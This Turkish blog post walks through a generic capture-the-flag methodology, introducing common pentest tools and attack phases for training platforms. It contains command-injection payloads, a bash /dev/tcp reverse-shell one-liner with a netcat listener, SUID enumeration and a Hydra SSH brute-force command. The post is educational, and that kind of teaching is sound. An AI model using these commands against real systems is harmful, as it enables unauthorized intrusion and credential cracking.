← Blog'a Dön

CTF Çözümü: Siber Güvenlik Araçları ve Saldırı Teknikleri

31 Aralık 2025
#Pentest#SiberGüvenlik#BilgiGüvenliği#EthicalHacking#KaliLinux#Nmap#CTF#ReverseShell#CommandInjection#YetkiYükseltme
👁 0🤍 0

Bir Siber Güvenlik Macerası: Temel Araçlar ve Saldırı Yöntemleriyle Adım Adım Bir CTF Analizi

Alt Başlık: Kali Linux'tan Reverse Shell'e, Gerçek Bir Senaryoda Kullanılan Araç ve Teknikleri Öğrenin.

Giriş Bölümü: "Sanal Laboratuvar: Hackerlar Gibi Düşünmeyi Öğrenmek"

Hiç bir hackerın bir sistemi nasıl test ettiğini merak ettiniz mi? Gizli dosyaları nasıl bulur, bir sunucuya nasıl sızar ve kontrolü nasıl ele alır? Cevap, siber güvenlik araçları ve metodolojilerinde yatıyor.

Bu yazıda, gerçek bir CTF (Capture The Flag) çözümlemesinden yola çıkarak, en yaygın siber güvenlik araçlarını ve saldırı aşamalarını pratik bir şekilde açıklayacağız.

Önemli Uyarı: Bu bilgiler sadece etik ve yasal sınırlar içinde (kendi sisteminizde, izin verilen sanal ortamlarda) eğitim amaçlı kullanılmalıdır. İzinsiz sistemlere erişim suçtur.

Bölüm 1: Silah Sandığımız: Temel Siber Güvenlik Araçları

Çalışma Platformumuz: Kali Linux

Kali Linux, özel olarak siber güvenlik testleri için tasarlanmış bir Linux dağıtımıdır. İçinde yüzlerce güvenlik aracıyla hazır geldiği için pentester'ların tercihidir.

# Kali Linux'ta temel terminal komutu
whoami
# Kullanıcı kimliğinizi gösterir

Eğitim Alanlarımız: TryHackMe & Hack The Box

Bu platformlar, gerçekçi ama kontrollü ortamlarda pratik yapmanızı sağlar. Yeni başlayanlar için TryHackMe, daha deneyimliler için Hack The Box önerilir.

Ağ Haritalayıcı: Nmap

Nmap, bir "sanal eldivenli çanta" gibidir. Hedef sistemde açık portları ve çalışan servisleri keşfetmenizi sağlar.

# Temel Nmap tarama komutu
nmap -sV -sC 10.10.10.10
# -sV: Versiyon tespiti
# -sC: Varsayılan scriptleri çalıştır

Gizli Geçit Avcısı: GoBuster

GoBuster, web sitelerinde görünmeyen dizin ve dosyaları bulmak için "sözlük saldırısı" (fuzzing) yapar.

# GoBuster ile dizin tarama
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt

Trafik Gözcüsü: Burp Suite

Burp Suite, web trafiğini yakalayıp manipüle etmenizi sağlayan profesyonel bir araçtır.

Hızlı Tetikçiler: Nikto & Hydra

  • Nikto: Hızlı web güvenlik açığı taraması yapar
  • Hydra: Parola kırma (brute-force) saldırılarında kullanılır

Ağın İsviçre Çakısı: Netcat (nc)

Netcat'in basitliği ve gücü onu vazgeçilmez kılar. Reverse shell bağlantılarını dinlemede hayati rol oynar.

# Netcat ile port dinleme
nc -lvnp 4444
# -l: dinleme modu, -v: verbose, -n: DNS çözümleme yok, -p: port

Otomatik Dedektif: LinPEAS

LinPEAS, Linux sistemlerde yetki yükseltme (privilege escalation) yollarını otomatik olarak tarayan bir scripttir.

Bölüm 2: Saldırı Metodolojisi: Adım Adım Bir Sistemde İlerlemek

1. Aşama: Keşif (Reconnaissance)

Pasif Keşif: CTF talimatlarını dikkatlice okumak gibi OSINT (Açık Kaynak İstihbarat) teknikleriyle başlar.

Aktif Keşif: Nmap ve GoBuster gibi araçlarla hedef sistemi tararız.

# Örnek keşif senaryosu
nmap -sC -sV 10.10.10.10
# Çıktı: 80 portunda web servisi, 22 portunda SSH

2. Aşama: Erişim Kazanma (Gaining Access)

Komut Enjeksiyonu (Command Injection) zafiyeti, bir uygulamanın kullanıcı girdisini doğrulamadan işletim sistemine komut olarak geçirmesidir.

# Örnek komut enjeksiyonu testi
# Web formuna girilebilecek payload'lar:
; whoami
| ls -la
`id`

Ters Kabuk (Reverse Shell), firewall'ları atlatmak için kullanılan bir tekniktir. Hedef sistemin sizin dinleme yaptığınız porta bağlanmasını sağlarsınız.

# Dinleyici taraf (sizin makinanız):
nc -lvnp 4444

# Hedef sistemde çalıştırılacak komut (komut enjeksiyonu ile):
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

3. Aşama: Yetki Yükseltme (Privilege Escalation)

Hedef sistemdeki kullanıcı haklarınızı artırmak için çeşitli yöntemler vardır:

# Temel yetki kontrol komutları
sudo -l
# Kullanıcının sudo yetkilerini listeler

find / -perm -u=s -type f 2>/dev/null
# SUID biti set edilmiş dosyaları bulur

LinPEAS gibi araçlar bu süreci otomatikleştirir:

# LinPEAS kullanımı
./linpeas.sh

4. Aşama: Brute-Force ve Diğer Yöntemler

Sözlük Saldırısı (Dictionary Attack), Hydra gibi araçlarla zayıf parolaları kırmaya çalışır:

# Hydra ile SSH brute-force örneği
hydra -l user -P passwords.txt ssh://10.10.10.10

Sonuç Bölümü: "Bilgi Güvenliğin Temelidir"

Bu yazıda, bir CTF senaryosu üzerinden temel siber güvenlik araçlarını (Kali Linux, Nmap, GoBuster, Netcat) ve kritik saldırı aşamalarını (Keşif, Komut Enjeksiyonu, Ters Kabuk) inceledik.

Unutmayın, bu metodoloji siber güvenlik uzmanlarının sistemlerdeki zayıf noktaları anlamak ve güçlendirmek için kullandığı bir araçtır.

Harekete Geçirici Mesaj:

Bir sonraki yazımızda, Burp Suite ile web güvenliğini derinlemesine inceleyeceğiz.

Son Söz: "Bir saldırganın bildiği her şeyi, bir savunmacı da bilmek zorundadır."


Not: Bu makale eğitim amaçlıdır. Tüm güvenlik testleri yalnızca sahip olduğunuz sistemlerde veya izin verilen platformlarda gerçekleştirilmelidir.